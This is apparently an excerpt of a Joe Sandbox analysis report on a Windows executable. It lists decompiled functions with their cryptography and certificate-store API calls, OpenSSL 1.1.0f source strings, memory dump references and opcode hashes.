                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CryptEnumErrorLastProviders
                                  • String ID: %lX$%lu. %s, type %lu$..\..\openssl-1.1.0f\engines\e_capi.c$Available CSPs:$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d$capi_list_providers
                                  • API String ID: 747760079-1615478548
                                  • Opcode ID: c3585f9a2e22dbb8c893a43d36b6a7e73c2f265b0e86a804e5a178df191079ee
                                  • Instruction ID: 76d642ff9539e9f46ed57ca17f072f9eaa3817ecaa21168c04b2a05708161a4f
                                  • Opcode Fuzzy Hash: c3585f9a2e22dbb8c893a43d36b6a7e73c2f265b0e86a804e5a178df191079ee
                                  • Instruction Fuzzy Hash: E4416B71641706BBE720BF64CC8BF7B7F8EFB80B44F440416F609A6192E664D940836A
                                  Function 005F0490 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 177encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(00000004,?,?,?,?), ref: 005F05A0
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 005F05D4
                                  • CryptGetUserKey.ADVAPI32(00000004,?,00000000), ref: 005F060D
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 005F0645
                                  • CryptReleaseContext.ADVAPI32(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F0675
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Crypt$ContextErrorLast$AcquireReleaseUser
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced RSA and AES Cryptographic Provider$capi_get_key, contname=%s, provname=%s, type=%d
                                  • API String ID: 3038057558-3141597722
                                  • Opcode ID: e8fb5984d185b0bc567ceff6651a04224e1079aaa7c9b0e4edddc135bfaa67d0
                                  • Instruction ID: 171d6a521599a00e301b401b3882298209947399349a07daca2ea98f1d7494ca
                                  • Opcode Fuzzy Hash: e8fb5984d185b0bc567ceff6651a04224e1079aaa7c9b0e4edddc135bfaa67d0
                                  • Instruction Fuzzy Hash: 17513B71644306ABEB20AF54CC46F7B7BDEFB94B04F44141AFA05DA292E7B4D540CB51
                                  Function 005F1870 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 207encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005F1AD0: CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 005F1B19
                                    • Part of subcall function 005F1AD0: GetLastError.KERNEL32 ref: 005F1B4F
                                  • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 005F18CE
                                  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 005F19A3
                                  • CertCloseStore.CRYPT32(?,00000000), ref: 005F19B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CertStore$CertificatesEnum$CloseErrorLastOpen
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Can't Parse Certificate %d$xXi
                                  • API String ID: 1078304334-2951057248
                                  • Opcode ID: 3a47c0c77919dc598fcc472a674ce72aa16c4b3545cddfe767ffefc16ad34400
                                  • Instruction ID: 7fb6de1a9ce9536ecdb7c35876d2441b21b7603e8f788f645d96ce692d716d46
                                  • Opcode Fuzzy Hash: 3a47c0c77919dc598fcc472a674ce72aa16c4b3545cddfe767ffefc16ad34400
                                  • Instruction Fuzzy Hash: FD51EF71600709AFE711AF249C45F3B7BAAFF85354F040428FA4597212EB35D9158B9A
                                  Function 005F0D60 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 176encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptEnumProvidersW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,005EF578,?,?), ref: 005F0DA9
                                  • GetLastError.KERNEL32(?,005EF578,?,?), ref: 005F0DB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CryptEnumErrorLastProviders
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d
                                  • API String ID: 747760079-4069671840
                                  • Opcode ID: ca308c58b1f52a37f2859e8b94c5f348e77d5144b104694ce008fd1e6031cb74
                                  • Instruction ID: bae64a575802d700c36b7c43204dd49f4168d04fd2d1ceefa6c37c828cb44e80
                                  • Opcode Fuzzy Hash: ca308c58b1f52a37f2859e8b94c5f348e77d5144b104694ce008fd1e6031cb74
                                  • Instruction Fuzzy Hash: 58514B71B403016BE750BB69DC47F6B7B8DBBD4B15F840417F609D72C2EA64D4448392
                                  Function 005EF790 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005EF7D4
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 005EF7FC
                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,?,F0000000,?,00000000), ref: 005EF816
                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 005EF825
                                  • GetLastError.KERNEL32 ref: 005EF8B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharContextCryptMultiWide$AcquireErrorLastRelease
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_ctx_set_provname, name=%s, type=%d
                                  • API String ID: 2868654666-3030445155
                                  • Opcode ID: c4a5f3907f01efedf4806a27353c367f16e75e05af292d907d9313ebeae1345a
                                  • Instruction ID: f41beca88449b60a177059cfa733c16ef7f7d8c46a7d43ae33304c125b2381e5
                                  • Opcode Fuzzy Hash: c4a5f3907f01efedf4806a27353c367f16e75e05af292d907d9313ebeae1345a
                                  • Instruction Fuzzy Hash: CA41D671B40205BBDB20AFA9DC46FAE7B6DFB44725F400126F909EB2C1DB71995087A1
                                  Function 005E9010 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 453timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005E9045
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Time$FileSystem
                                  • String ID: ....................$..\..\openssl-1.1.0f\crypto\rand\md_rand.c$You need to read the OpenSSL FAQ, https://www.openssl.org/docs/faq.html$gfff$jjj
                                  • API String ID: 2086374402-3002219860
                                  • Opcode ID: 421d2b16ba4b0bd0fe94992bb2c54eb536a0862b15550ecd2faba334d1529f4f
                                  • Instruction ID: 0598316b66396ab69d9564abfc5837f694cae27be7487d3b2736eb5e96137b11
                                  • Opcode Fuzzy Hash: 421d2b16ba4b0bd0fe94992bb2c54eb536a0862b15550ecd2faba334d1529f4f
                                  • Instruction Fuzzy Hash: A4F11374A043815ED714AF399C0AB6A7FE6BF85304F08592FF985CA243EA76C449CB52
                                  Function 005F0F80 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005F11C0
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F11DA
                                  Strings
                                  • ..\..\openssl-1.1.0f\engines\e_capi.c, xrefs: 005F1183
                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 005F11B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ContextCrypt$AcquireRelease
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Microsoft Enhanced RSA and AES Cryptographic Provider
                                  • API String ID: 2306398074-1702151034
                                  • Opcode ID: 6b9441a6688195af6d10a3a617ae7c7a9372064b7087d83847bc91eb0f7cfdba
                                  • Instruction ID: b24f21a7fb1178e2c6d2703f8a01665aabffdae7881b178dc3d58fb35de55788
                                  • Opcode Fuzzy Hash: 6b9441a6688195af6d10a3a617ae7c7a9372064b7087d83847bc91eb0f7cfdba
                                  • Instruction Fuzzy Hash: 4141A774A41646AAEB213724BC0BF7B3E5ABB40345F040437FF04A52A2FE66E910D66D
                                  Function 005F0400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptDestroyKey.ADVAPI32(?), ref: 005F040C
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F0417
                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 005F0424
                                  Strings
                                  • ..\..\openssl-1.1.0f\engines\e_capi.c, xrefs: 005F042F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ContextCrypt$CertCertificateDestroyFreeRelease
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                  • API String ID: 1168903292-3997076816
                                  • Opcode ID: 919f4e661a09c9b0a0f8f0b6b2b284a3b0c08e3271dd170eded530d3cbc07a46
                                  • Instruction ID: 8d61d75e08d5703850653c18a9385ba017e097cc679366f8c47e7997295890c5
                                  • Opcode Fuzzy Hash: 919f4e661a09c9b0a0f8f0b6b2b284a3b0c08e3271dd170eded530d3cbc07a46
                                  • Instruction Fuzzy Hash: 4EE02631640710B7DF201F10FC09F4A7B9EBF44B01F045408FA06A61A0CB2098819751
                                  Function 005D2521 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005D252D
                                  • IsDebuggerPresent.KERNEL32 ref: 005D25F9
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005D2619
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 005D2623
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 254469556-0
                                  • Opcode ID: 4ee8875d8938704698fec011095406442786da71175974c8f177898f5960ab5d
                                  • Instruction ID: e4e74bd6bfe96fedaba332708edaf51d95ba31338f09ce36c9086de7ef87cd8d
                                  • Opcode Fuzzy Hash: 4ee8875d8938704698fec011095406442786da71175974c8f177898f5960ab5d
                                  • Instruction Fuzzy Hash: 2E312975D0531C9BDB21DFA5D989BCCBBB8BF18304F1041AAE409AB250EB709B85CF44
                                  Function 0063ECA0 Relevance: 4.7, Strings: 3, Instructions: 962COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$`<b$?b
                                  • API String ID: 0-740138778
                                  • Opcode ID: aeed9caa3c9fef2a422baf84f325e95b064fc47a610d53abc7d65241fbe7a8ab
                                  • Instruction ID: 51ccdafcc126247692957a9f9254faed24c2dd7c5d9a5e9f590a539714cf7357
                                  • Opcode Fuzzy Hash: aeed9caa3c9fef2a422baf84f325e95b064fc47a610d53abc7d65241fbe7a8ab
                                  • Instruction Fuzzy Hash: E6B217714542508FE368DF25C8A8A6ABBEAFF89304F554A5DD59B2F341C732B502CF82
                                  Function 00674EEB Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00674FE3
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00674FED
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00674FFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 79b3c5ecb019d821d5f028491ca7a6d11eb807aeb1cecaba982604838f197dff
                                  • Instruction ID: ae1376643fcc26b9ac1d866d0de45417e54a1d0d8441b96130907cb94a58e1fe
                                  • Opcode Fuzzy Hash: 79b3c5ecb019d821d5f028491ca7a6d11eb807aeb1cecaba982604838f197dff
                                  • Instruction Fuzzy Hash: AF31C27491121CABCB21DF68D88979CBBB8BF18310F5042EAE81CA6251EB709F858F45
                                  Function 00668E2A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000003,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002,00000000,?,006749E4,00000003), ref: 00668E4B
                                  • TerminateProcess.KERNEL32(00000000,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002,00000000,?,006749E4,00000003), ref: 00668E52
                                  • ExitProcess.KERNEL32 ref: 00668E64
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 30d957d7d63e40895633ba8106f357f08742508b6e61b567fb73363c9b8b11de
                                  • Instruction ID: 6222c90cf3c53c079e467663a4dc73f7263671d5874334c59039737a502d6da5
                                  • Opcode Fuzzy Hash: 30d957d7d63e40895633ba8106f357f08742508b6e61b567fb73363c9b8b11de
                                  • Instruction Fuzzy Hash: 32E04632050248AFCF016F20CC0CA8A3B2BEB52782B004618F9089B221CB36DD82CB41
                                  Function 005E0800 Relevance: 4.3, Strings: 3, Instructions: 564COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +$0$gfff
                                  • API String ID: 0-3073000171
                                  • Opcode ID: faeb8fbbecf144c05b7db5c90b7c0cd74d200095f7981addb33a3d7bd0da5410
                                  • Instruction ID: f16274f3d8ef857e5f79b00d6228526d4043e4649ebc13a2b60fb302ec8e051e
                                  • Opcode Fuzzy Hash: faeb8fbbecf144c05b7db5c90b7c0cd74d200095f7981addb33a3d7bd0da5410
                                  • Instruction Fuzzy Hash: 1412D7319087919FD7599F2A880072BBFE5BFC9744F446A2DF8D9D3292D7B0C8818B52
                                  Function 005C4408 Relevance: 4.0, Strings: 2, Instructions: 1470COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MT\
                                  • API String ID: 0-1976110113
                                  • Opcode ID: 1d36a855821d37a3f5b20b0a8a90753050f23cc2b76184578e64421c17ce947a
                                  • Instruction ID: 24e52e1e9529eb7ab1c2aeda5c6286473af72ef453ef0def960fdf0780b4a3bb
                                  • Opcode Fuzzy Hash: 1d36a855821d37a3f5b20b0a8a90753050f23cc2b76184578e64421c17ce947a
                                  • Instruction Fuzzy Hash: B3C2C571F101298FDF08CFADC891AADB7F2BF88314B55426DD416EB385DA74A942CB84
                                  Function 00675337 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 19e51ccb60a2791c75152ed210bfd7c75904f6c83a4fe1ad1b21dc1d09005ba4
                                  • Instruction ID: 073d29d05c89e445cf9d064b5bf782d87563e6120900c4b08fb482e315ba3e21
